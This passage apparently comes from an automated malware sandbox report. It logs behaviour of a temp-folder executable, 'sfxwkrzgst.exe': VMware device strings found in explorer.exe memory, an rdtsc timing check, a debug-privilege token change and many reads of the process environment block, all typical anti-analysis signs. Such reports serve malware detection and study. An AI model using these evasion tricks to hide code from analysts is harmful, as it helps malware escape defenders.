          Source: explorer.exe, 00000006.00000000.295963226.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.285804347.00000000083FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
          Source: explorer.exe, 00000006.00000000.322076519.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
          Source: explorer.exe, 00000006.00000000.285187233.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000006.00000000.266949938.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000006.00000000.299532501.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_004088D0 rdtsc 4_2_004088D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_02720402 mov eax, dword ptr fs:[00000030h]2_2_02720402
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_02720616 mov eax, dword ptr fs:[00000030h]2_2_02720616
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_02720706 mov eax, dword ptr fs:[00000030h]2_2_02720706
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_027206C7 mov eax, dword ptr fs:[00000030h]2_2_027206C7
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 2_2_02720744 mov eax, dword ptr fs:[00000030h]2_2_02720744
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C4120 mov eax, dword ptr fs:[00000030h]4_2_012C4120
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C4120 mov eax, dword ptr fs:[00000030h]4_2_012C4120
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C4120 mov eax, dword ptr fs:[00000030h]4_2_012C4120
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C4120 mov eax, dword ptr fs:[00000030h]4_2_012C4120
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C4120 mov ecx, dword ptr fs:[00000030h]4_2_012C4120
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D513A mov eax, dword ptr fs:[00000030h]4_2_012D513A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D513A mov eax, dword ptr fs:[00000030h]4_2_012D513A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9100 mov eax, dword ptr fs:[00000030h]4_2_012A9100
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9100 mov eax, dword ptr fs:[00000030h]4_2_012A9100
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9100 mov eax, dword ptr fs:[00000030h]4_2_012A9100
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AC962 mov eax, dword ptr fs:[00000030h]4_2_012AC962
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AB171 mov eax, dword ptr fs:[00000030h]4_2_012AB171
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AB171 mov eax, dword ptr fs:[00000030h]4_2_012AB171
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB944 mov eax, dword ptr fs:[00000030h]4_2_012CB944
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB944 mov eax, dword ptr fs:[00000030h]4_2_012CB944
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013251BE mov eax, dword ptr fs:[00000030h]4_2_013251BE
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013251BE mov eax, dword ptr fs:[00000030h]4_2_013251BE
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013251BE mov eax, dword ptr fs:[00000030h]4_2_013251BE
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013251BE mov eax, dword ptr fs:[00000030h]4_2_013251BE
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D61A0 mov eax, dword ptr fs:[00000030h]4_2_012D61A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D61A0 mov eax, dword ptr fs:[00000030h]4_2_012D61A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013649A4 mov eax, dword ptr fs:[00000030h]4_2_013649A4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013649A4 mov eax, dword ptr fs:[00000030h]4_2_013649A4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013649A4 mov eax, dword ptr fs:[00000030h]4_2_013649A4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013649A4 mov eax, dword ptr fs:[00000030h]4_2_013649A4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov ecx, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov ecx, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov eax, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov ecx, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov ecx, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov eax, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov ecx, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov ecx, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov eax, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov ecx, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov ecx, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C99BF mov eax, dword ptr fs:[00000030h]4_2_012C99BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013269A6 mov eax, dword ptr fs:[00000030h]4_2_013269A6
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DA185 mov eax, dword ptr fs:[00000030h]4_2_012DA185
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CC182 mov eax, dword ptr fs:[00000030h]4_2_012CC182
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2990 mov eax, dword ptr fs:[00000030h]4_2_012D2990
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AB1E1 mov eax, dword ptr fs:[00000030h]4_2_012AB1E1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AB1E1 mov eax, dword ptr fs:[00000030h]4_2_012AB1E1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AB1E1 mov eax, dword ptr fs:[00000030h]4_2_012AB1E1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013341E8 mov eax, dword ptr fs:[00000030h]4_2_013341E8
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D002D mov eax, dword ptr fs:[00000030h]4_2_012D002D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D002D mov eax, dword ptr fs:[00000030h]4_2_012D002D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D002D mov eax, dword ptr fs:[00000030h]4_2_012D002D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D002D mov eax, dword ptr fs:[00000030h]4_2_012D002D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D002D mov eax, dword ptr fs:[00000030h]4_2_012D002D
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BB02A mov eax, dword ptr fs:[00000030h]4_2_012BB02A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BB02A mov eax, dword ptr fs:[00000030h]4_2_012BB02A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BB02A mov eax, dword ptr fs:[00000030h]4_2_012BB02A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012BB02A mov eax, dword ptr fs:[00000030h]4_2_012BB02A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA830 mov eax, dword ptr fs:[00000030h]4_2_012CA830
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA830 mov eax, dword ptr fs:[00000030h]4_2_012CA830
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA830 mov eax, dword ptr fs:[00000030h]4_2_012CA830
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA830 mov eax, dword ptr fs:[00000030h]4_2_012CA830
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01374015 mov eax, dword ptr fs:[00000030h]4_2_01374015
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01374015 mov eax, dword ptr fs:[00000030h]4_2_01374015
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01327016 mov eax, dword ptr fs:[00000030h]4_2_01327016
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01327016 mov eax, dword ptr fs:[00000030h]4_2_01327016
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01327016 mov eax, dword ptr fs:[00000030h]4_2_01327016
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01371074 mov eax, dword ptr fs:[00000030h]4_2_01371074
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01362073 mov eax, dword ptr fs:[00000030h]4_2_01362073
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C0050 mov eax, dword ptr fs:[00000030h]4_2_012C0050
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C0050 mov eax, dword ptr fs:[00000030h]4_2_012C0050
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E90AF mov eax, dword ptr fs:[00000030h]4_2_012E90AF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D20A0 mov eax, dword ptr fs:[00000030h]4_2_012D20A0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DF0BF mov ecx, dword ptr fs:[00000030h]4_2_012DF0BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DF0BF mov eax, dword ptr fs:[00000030h]4_2_012DF0BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DF0BF mov eax, dword ptr fs:[00000030h]4_2_012DF0BF
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A9080 mov eax, dword ptr fs:[00000030h]4_2_012A9080
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01323884 mov eax, dword ptr fs:[00000030h]4_2_01323884
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01323884 mov eax, dword ptr fs:[00000030h]4_2_01323884
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A58EC mov eax, dword ptr fs:[00000030h]4_2_012A58EC
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB8E4 mov eax, dword ptr fs:[00000030h]4_2_012CB8E4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB8E4 mov eax, dword ptr fs:[00000030h]4_2_012CB8E4
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A40E1 mov eax, dword ptr fs:[00000030h]4_2_012A40E1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A40E1 mov eax, dword ptr fs:[00000030h]4_2_012A40E1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A40E1 mov eax, dword ptr fs:[00000030h]4_2_012A40E1
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov eax, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov ecx, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov eax, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov eax, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov eax, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0133B8D0 mov eax, dword ptr fs:[00000030h]4_2_0133B8D0
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA309 mov eax, dword ptr fs:[00000030h]4_2_012CA309
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136131B mov eax, dword ptr fs:[00000030h]4_2_0136131B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012ADB60 mov ecx, dword ptr fs:[00000030h]4_2_012ADB60
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D3B7A mov eax, dword ptr fs:[00000030h]4_2_012D3B7A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D3B7A mov eax, dword ptr fs:[00000030h]4_2_012D3B7A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012ADB40 mov eax, dword ptr fs:[00000030h]4_2_012ADB40
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01378B58 mov eax, dword ptr fs:[00000030h]4_2_01378B58
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AF358 mov eax, dword ptr fs:[00000030h]4_2_012AF358
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4BAD mov eax, dword ptr fs:[00000030h]4_2_012D4BAD
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4BAD mov eax, dword ptr fs:[00000030h]4_2_012D4BAD
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D4BAD mov eax, dword ptr fs:[00000030h]4_2_012D4BAD
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_01375BA5 mov eax, dword ptr fs:[00000030h]4_2_01375BA5
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B1B8F mov eax, dword ptr fs:[00000030h]4_2_012B1B8F
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B1B8F mov eax, dword ptr fs:[00000030h]4_2_012B1B8F
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D138B mov eax, dword ptr fs:[00000030h]4_2_012D138B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D138B mov eax, dword ptr fs:[00000030h]4_2_012D138B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D138B mov eax, dword ptr fs:[00000030h]4_2_012D138B
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0135D380 mov ecx, dword ptr fs:[00000030h]4_2_0135D380
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D2397 mov eax, dword ptr fs:[00000030h]4_2_012D2397
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136138A mov eax, dword ptr fs:[00000030h]4_2_0136138A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012DB390 mov eax, dword ptr fs:[00000030h]4_2_012DB390
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CDBE9 mov eax, dword ptr fs:[00000030h]4_2_012CDBE9
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012D03E2 mov eax, dword ptr fs:[00000030h]4_2_012D03E2
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013523E3 mov ecx, dword ptr fs:[00000030h]4_2_013523E3
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013523E3 mov ecx, dword ptr fs:[00000030h]4_2_013523E3
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013523E3 mov eax, dword ptr fs:[00000030h]4_2_013523E3
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013253CA mov eax, dword ptr fs:[00000030h]4_2_013253CA
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_013253CA mov eax, dword ptr fs:[00000030h]4_2_013253CA
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E4A2C mov eax, dword ptr fs:[00000030h]4_2_012E4A2C
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E4A2C mov eax, dword ptr fs:[00000030h]4_2_012E4A2C
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CA229 mov eax, dword ptr fs:[00000030h]4_2_012CA229
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012CB236 mov eax, dword ptr fs:[00000030h]4_2_012CB236
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136AA16 mov eax, dword ptr fs:[00000030h]4_2_0136AA16
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0136AA16 mov eax, dword ptr fs:[00000030h]4_2_0136AA16
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012B8A0A mov eax, dword ptr fs:[00000030h]4_2_012B8A0A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012C3A1C mov eax, dword ptr fs:[00000030h]4_2_012C3A1C
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A5210 mov eax, dword ptr fs:[00000030h]4_2_012A5210
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A5210 mov ecx, dword ptr fs:[00000030h]4_2_012A5210
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A5210 mov eax, dword ptr fs:[00000030h]4_2_012A5210
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012A5210 mov eax, dword ptr fs:[00000030h]4_2_012A5210
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AAA16 mov eax, dword ptr fs:[00000030h]4_2_012AAA16
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012AAA16 mov eax, dword ptr fs:[00000030h]4_2_012AAA16
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_012E927A mov eax, dword ptr fs:[00000030h]4_2_012E927A
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0135B260 mov eax, dword ptr fs:[00000030h]4_2_0135B260
          Source: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exeCode function: 4_2_0135B260 mov eax, dword ptr fs:[00000030h]4_2_0135B260
